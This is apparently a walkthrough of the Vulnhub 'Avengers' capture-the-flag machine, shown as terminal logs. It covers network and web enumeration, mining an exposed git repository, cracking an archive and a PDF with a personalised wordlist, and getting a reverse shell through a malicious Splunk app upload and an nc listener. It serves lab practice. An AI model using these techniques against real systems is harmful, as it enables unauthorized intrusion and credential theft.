Reconnaissance
┌──(root㉿cyber)-[~]
└─# arp-scan -l
192.168.2.106 08:00:27:84:fe:04 PCS Systemtechnik GmbH
┌──(root㉿cyber)-[~]
└─# vi /etc/hosts
192.168.2.106 avengers.vln
┌──(root㉿cyber)-[~]
└─# nmap -sS -sV -A -T5 192.168.2.106 -p- | grep open
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open http Splunkd httpd
8089/tcp open ssl/http Splunkd httpd
┌──(root㉿cyber)-[~]
└─# nmap -sS -sV -A -T5 192.168.2.106 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-27 21:54 CET
Nmap scan report for avengers.vln (192.168.2.106)
Host is up (0.00013s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Avengers Arsenal
|_http-server-header: Apache/2.4.29 (Ubuntu)
| http-git:
| 192.168.2.106:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Remotes:
|_ https://github.com/Ignitetechnologies/Web-Application-Cheatsheet.git
| http-robots.txt: 1 disallowed entry
|_/groot
8000/tcp open http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Splunkd
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://avengers.vln:8000/en-US/account/login?return_to=%2Fen-US%2F
8089/tcp open ssl/http Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-09-16T14:51:44
|_Not valid after: 2022-09-15T14:51:44
|_http-server-header: Splunkd
|_http-title: splunkd
| http-robots.txt: 1 disallowed entry
|_/
MAC Address: 08:00:27:84:FE:04 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Linux 3.2 - 4.9 (97%), Linux 5.1 (95%), Netgear RAIDiator 4.2.28 (94%), Linux 2.6.32 (94%),
Linux 4.15 - 5.8 (94%), Linux 2.6.32 - 2.6.35 (94%), Linux 2.6.32 - 3.5 (94%), Linux 2.6.32 - 3.10 (94%),
Linux 5.0 - 5.5 (93%), Android 4.0 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.12 ms avengers.vln (192.168.2.106)
┌──(root㉿cyber)-[~]
└─# nikto -h 192.168.2.106
┌──(root㉿cyber)-[~]
└─#
gobuster dir -u http://avengers.vln -x txt,php,rar,zip,tar,pub,xls,docx,doc,sql,db,mdb,asp,aspx,accdb,bat,ps1,exe,.....
http://avengers.vln/index.html (Status: 200) [Size: 7165]
http://avengers.vln/images (Status: 301) [Size: 313] [--> http://avengers.vln/images/]
http://avengers.vln/css (Status: 301) [Size: 310] [--> http://avengers.vln/css/]
http://avengers.vln/robots.txt (Status: 200) [Size: 31]
http://avengers.vln/spammimic (Status: 301) [Size: 316] [--> http://avengers.vln/spammimic/]
Progress: 8381204 / 8381242 (100.00%)
User-agent: *
Disallow: /groot
Index of /groot
[IC] Name Last modified Size Description
[PARENTDIR] Parent Directory -
hammer.zip 2019-09-17 02:17 191K
Apache/2.4.29 (Ubuntu) Server at 192.168.2.106 Port 80
--2024-01-27 23:42:31-- http://192.168.2.106/groot/hammer.zip
Verbindungsaufbau zu 192.168.2.106:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 195979 (191K) [application/zip]
Wird in hammer.zip gespeichert.
hammer.zip 100%[=======================================>] 191,39K --.-KB/s in 0,001s
2024-01-27 23:42:31 (318 MB/s) - hammer.zip gespeichert [195979/195979]
┌──(root㉿cyber)-[~]
└─# zip2john hammer.zip > hash
ver 2.0 efh 5455 efh 7875 hammer.zip/mjlonir.pdf PKZIP Encr: TS_chk, cmplen=195791, decmplen=197031, crc=D414E46C ts=1A76 cs=1a76 type=8
hammer.zip/mjlonir.pdf:$pkzip$1*1*2*0*2fccf*301a7*d414e46c*0*45*8*2fccf*1a76*8ac2a9e2cc7dcab6f27d56aec70f59f4d5a051fd77781d73115f78926b5cfeeb422f8f132dac095d3b1f59cbd6c8ebe596cddf643d0ef755ae00f034c2db745d0635448b7f61a1e4f4f4235000da5dd88657e9f499b306aeb687c3ed50a19478ee88f2be085c0510f0df7c42a95ffa7a9253d9fa46137acf1c6c341c25fd8e1b42....
Fehler: Verbindung unterbrochen
Die Verbindung zum Server wurde zurückgesetzt, während die Seite geladen wurde.
--2024-01-27 23:54:01-- http://avengers.vln/images/17.jpeg
Auflösen des Hostnamens avengers.vln (avengers.vln)… 192.168.2.106
Verbindungsaufbau zu avengers.vln (avengers.vln)|192.168.2.106|:80 … verbunden.
HTTP-Anforderung gesendet, auf Antwort wird gewartet … 200 OK
Länge: 21147 (21K) [image/jpeg]
Wird in 17.jpeg gespeichert.
17.jpeg 100%[=======================================>] 20,65K --.-KB/s in 0s
2024-01-27 23:54:01 (1,17 GB/s) - 17.jpeg gespeichert [21147/21147]
┌──(root㉿cyber)-[~]
└─# unzip hammer.zip
Archive: hammer.zip
[hammer.zip] mjlonir.pdf password: spammimic
password incorrect--reenter:
Welcome, Welcome1, Password123
┌──(root㉿cyber)-[~/avengers]
└─# cat README.md
# Web Application Cheatsheet (Vulnhub)
This cheatsheet is aimed at the CTF Players and Beginners to help them understand Web Application Vulnerablity with examples.
There are multiple ways to perform the same tasks. We have performed and compiled this list on our experience. Please share
this with your connections and direct queries and feedback to [Pavandeep Singh](https://www.linkedin.com/in/pavan2318).
[1.1]: http://i.imgur.com/tXSoThF.png
[1]: http://www.twitter.com/rajchandel
# Follow us on
http://i.imgur.com/tXSoThF.png" alt text"" alt="alt text"[1]
img src="https://i.ibb.co/xfPQjzq/vulnhub-web-app.jpg"
Table of Contents
------------------------------------------------------------------------------------
* [Drupal](#drupal)
* [Jenkins](#jenkins)
* [Joomla](#joomla)
* [WebMin](#webmin)
* [Wordpress](#wordpress)
* [Builder Engine](#builder)
* [CMS Made Simple](#cmsms)
* [CouchDB](#couch)
* [Cuppa](#cuppa)
* [Cute News 2.0.3](#cute)
* [Impress](#impress)
* [LibreNMS](#librenms)
* [Moodle](#moodle)
* [Php Mailer](#phpmailer)
* [Playsms](#playsms)
* [Rips](#rips)
* [SPHP Blog](#sphp)
* [Squirrel Mail](#squirrel)
* [PHPText](#phptext)
* [Wolf](#wolf)
* [Zenphoto](#zen)
* [Redis](#redis)
* [Nano CMS](#nano)
┌──(root㉿cyber)-[~/avengers/.git]
└─# ls -la
insgesamt 48
drwxr-xr-x 7 root root 4096 28. Jan 00:03 .
drwxr-xr-x 3 root root 4096 28. Jan 00:03 ..
-rw-r--r-- 1 root root 293 28. Jan 00:03 config
-rw-r--r-- 1 root root 73 28. Jan 00:03 description
-rw-r--r-- 1 root root 23 28. Jan 00:03 HEAD
drwxr-xr-x 2 root root 4096 28. Jan 00:03 hooks
-rw-r--r-- 1 root root 137 28. Jan 00:03 index
drwxr-xr-x 2 root root 4096 28. Jan 00:03 info
drwxr-xr-x 3 root root 4096 28. Jan 00:03 logs
drwxr-xr-x 33 root root 4096 28. Jan 00:03 objects
-rw-r--r-- 1 root root 114 28. Jan 00:03 packed-refs
drwxr-xr-x 4 root root 4096 28. Jan 00:03 refs
┌──(root㉿cyber)-[~/avengers/.git]
└─# cat config
Klone nach 'hackingarticles'...
remote: Enumerating objects: 30, done.
remote: Total 30 (delta 0), reused 0 (delta 0), pack-reused 30
Empfange Objekte: 100% (30/30), 8.38 KiB | 8.38 MiB/s, fertig.
Löse Unterschiede auf: 100% (7/7), fertig.
┌──(root㉿cyber)-[~/hackingarticles]
└─# git log
commit 8de2234e98b50c97e0355ec98ff9e7051d4c796e (HEAD -> master, origin/master, origin/HEAD)
Author: Hackingzone
Date: Tue Sep 17 14:28:44 2019 +0530
mew mew
commit c78e3ddf70b748d1aea5ccaf1fedc3aaab4ac451
Author: Hackingzone
Date: Tue Sep 17 14:28:12 2019 +0530
IW
commit a6b610652780fb3979ee9cbd8600e93b6b740700
Author: Hackingzone
Date: Tue Sep 17 14:27:43 2019 +0530
end
commit 674dc193bcdf5df2db43da89132f6efe08f3b1e8
Author: Hackingzone
Date: Tue Sep 17 14:27:16 2019 +0530
avnge
commit 9b5d48af1ef4d5123544cf3007a2363346e7dd4a
Author: Hackingzone
Date: Tue Sep 17 14:26:29 2019 +0530
chitauri army
------------------------------------------------------------------------------------
q + enter um aus git log raus zu kommen
------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~/hackingarticles]
└─# git show 4fb65717a4bdfa8169fb0642abf0f355f7eea048
commit 4fb65717a4bdfa8169fb0642abf0f355f7eea048
Author: Hackingzone
Date: Tue Sep 17 14:04:45 2019 +0530
Captain America
diff --git a/CA.txt b/CA.txt
new file mode 100644
index 0000000..3fcec0d
--- /dev/null
+++ b/CA.txt
@@ -0,0 +1,5 @@
+Captain America's shield is his primary weapon. The most well-known of his shields is
+a disc-shaped object with a five-pointed star design in its center, within blue, red,
+and white concentric circles. This shield is composed of a unique Vibranium,
+Proto-Adamantium alloy, and an unknown third component.
+Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxknswNjE3DZEUE4QkI4UEyRkU3NDVERDI2RkUyRTEzQ30=
\ No newline at end of file
Q2FwdGFpbiBBbWVyaWNhJ3MgU2hpZWxknswNjE3DZEUE4QkI4UEyRkU3NDVERDI2RkUyRTEzQ30=
Captain America's Shield:{061786D9A8BB89A2FE745DD26FE2E13C}
Hash Type Result
061786D9A8BB89A2FE745DD26FE2E13C md5 geet
Scepter:{469F1394A349DCF8A742653CE093FA80}
Hash Type Result
469F1394A349DCF8A742653CE093FA80 md5 aarav
┌──(root㉿cyber)-[~]
└─# cupp -i
___________
cupp.py! # Common
\ # User
\ ,__, # Passwords
\ (oo)____ # Profiler
(__) )\
||--|| * [ Muris Kurgas | j0rgan@remote-exploit.org ]
[ Mebus | https://github.com/Mebus/]
[+] Insert the information about the victim to make a dictionary
[+] If you don't know all the info, just hit enter when asked! ;)
> First Name: tony
> Surname: stark
> Nickname: ironman
> Birthdate (DDMMYYYY): 01052008
> Partners) name:
> Partners) nickname:
> Partners) birthdate (DDMMYYYY):
> Child's name:
> Child's nickname:
> Child's birthdate (DDMMYYYY):
> Pet's name:
> Company name:
> Do you want to add some key words about the victim? Y/[N]: y
> Please enter the words, separated by comma. [i.e. hacker,juice,black], spaces will be removed: y
> Do you want to add special chars at the end of words? Y/[N]: n
> Do you want to add some random numbers at the end of words? Y/[N]:n
> Leet mode? (i.e. leet = 1337) Y/[N]: n
[+] Now making a dictionary...
[+] Sorting list and removing duplicates...
[+] Saving dictionary to tony.txt, counting 3610 words.
[+] Now load your pistolero with tony.txt and shoot! Good luck!
------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~]
└─# fcrackzip -D -u -v -p tony.txt hammer.zip
found file 'mjlonir.pdf', (size cp/uc 195791/197031, flags 9, chk 1a76)
PASSWRD FOUND!!!!: pw Stark12008
------------------------------------------------------------------------------------
┌──(root㉿cyber)-[~]
└─# unzip hammer.zip
Archive: hammer.zip
Enter password: Stark12008
┌──(root㉿cyber)-[~]
└─# ll
-rw-r--r-- 1 root root 197031 17. Sep 2019 mjlonir.pdf
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# pdf2john mjlonir.pdf > hash
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# john --wordlist=~/tony.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PDF [MD5 SHA2 RC4/AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Will run 16 penMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
------------------------------------------------------------------------------------
Tony_050081 (mjlonir.pdf)
------------------------------------------------------------------------------------
1g 0:00:00:00 DNE (2024-01-28 00:36) 100.0g/s 102400p/s 102400c/s 102400C/s Stark_5..Y0501008
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
------------------------------------------------------------------------------------
file:///home/cyber/Downloads/mjlonir.pdf
Mjølnir:{4A3232C59ECDA21AC71BEBE3B329BF36}
Hash Type Result
4A3232C59ECDA21AC71BEBE3B329BF36 md5 shreya
------------------------------------------------------------------------------------
view-source:http://avengers.vln/
Yaka Arrow Section --> Wielded by Yondu
The Yaka Arrow is a whistle-controlled arrow made from Yaka that uses technology
native to the Centaurian people.
The Yaka Arrow was Yondu Udonta's favored weapon. Highly skilled in its usage,
Udonta always kept one in a holster by his side.
href="ravagers.html"
61 67 65 6e 74 3a 61 76 65 6e 67 65 72 73
Navigation überspringen >
Apps
Administrator
6Nachrichten
Einstellungen
Aktivität
Hilfe
App hochladen
Apps App hochladen
Hochladen einer App
Wenn Ihnen eine App-Datei mit der Erweiterung '.spl' oder '.tar.gz' vorliegt, die Sie installieren möchten,
dann können Sie diese unter Verwendung dieses Formulars hochladen.
Sie können eine vorhandene App über die Splunk-Befehlszeile ersetzen. Erfahren Sie mehr.
Datei
App-Upgrade. Bei Auswahl dieser Option wird die App überschrieben, falls sie bereits vorhanden ist.
Abbrechen
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# tar zxvf 1.2.tar.gz
splunk_shells-1.2/
splunk_shells-1.2/.gitignore
splunk_shells-1.2/README.md
splunk_shells-1.2/appserver/
Möchten Sie Splunk wirklich neu starten?
Splunk Enterprise wird neu gestartet...
Neustart läuft. Bitte warten Sie.
Neustart erfolgreich – Dieses Dialogfeld schließen,
um zurück zur Anmeldeseite zu gelangen
Apps
Angezeigt werden 1-19 von 19 Elementen
Weitere Apps durchsuchen
App aus Datei installieren
App erstellen
...
..
...
Berechtigungen
Ausgewählte Rollenberechtigungen anwenden auf:
Erfahren Sie mehr
Nur diese App (splunk_shells-1.2) ()Alle Apps (System)
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# nc -lvnp 1234
listening on [any] 1234 ...
┌──(root㉿cyber)-[/home/cyber/Downloads]
└─# nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.2.199] from (UNKNWN) [192.168.2.106] 46944